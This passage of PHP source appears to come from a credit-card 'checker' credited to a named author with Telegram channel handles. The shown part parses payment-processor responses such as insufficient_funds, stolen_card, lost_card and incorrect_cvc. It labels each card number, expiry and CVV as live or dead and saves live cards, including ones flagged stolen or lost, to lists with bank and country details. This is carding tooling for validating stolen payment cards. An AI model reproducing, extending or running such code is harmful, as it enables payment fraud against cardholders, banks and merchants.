    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live Card</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Insufficient Funds </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "insufficient_funds")) {saveInsufficientLives ("Live Card (Insufficient Card) -> $cc|$mon|$year|$cvv | Checker Made By Abbey Saale");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live Card</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Insufficient Funds </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "lost_card" )) {saveLostLives ("Live CCN (Lost Card) -> $cc|$mon|$year|$cvv | Checker Made By Abbey Saale");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Lost Card </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>
';
}
elseif (strpos($result, "stolen_card" )) {saveStolenLives ("Live CCN (Stolen Card) -> $cc|$mon|$year|$cvv | Checker Made By Abbey Saale");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Stolen Card </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>
';
}
elseif (strpos($result, "Your card's security code is incorrect." )) {saveCCN ("Live CCN -> $cc|$mon|$year|$cvv | Checker Made By Abbey Saale");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Your card security code is incorrect </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "incorrect_cvc" )) {saveCCN ("Live CCN -> $cc|$mon|$year|$cvv | Checker Made By Abbey Saale");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Incorrect CVC </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "pickup_card" )) {savePickupLives ("Live CCN (Pickup Card) -> $cc|$mon|$year|$cvv | Checker Made By Abbey Saale");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Pickup Card </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,"fraudulent")){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Fraudulent </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card has expired.')) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Your card has expired </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, 'security code is invalid.' )) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Security Code is Invalid </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "expired_card" )) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Expired Card </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card number is incorrect.')) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Your card number is incorrect </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "incorrect_number")) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Incorrect Number </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "service_not_allowed")) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Service Not Allowed </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "do_not_honor")) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Do Not Honor </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "generic_decline")) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Generic Decline </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card was declined.')) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Your Card was Declined </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,'"cvc_check": "unavailable"')){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = CVC Unavailable </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,'"cvc_check": "unchecked"')){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = CVC Unchecked </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = 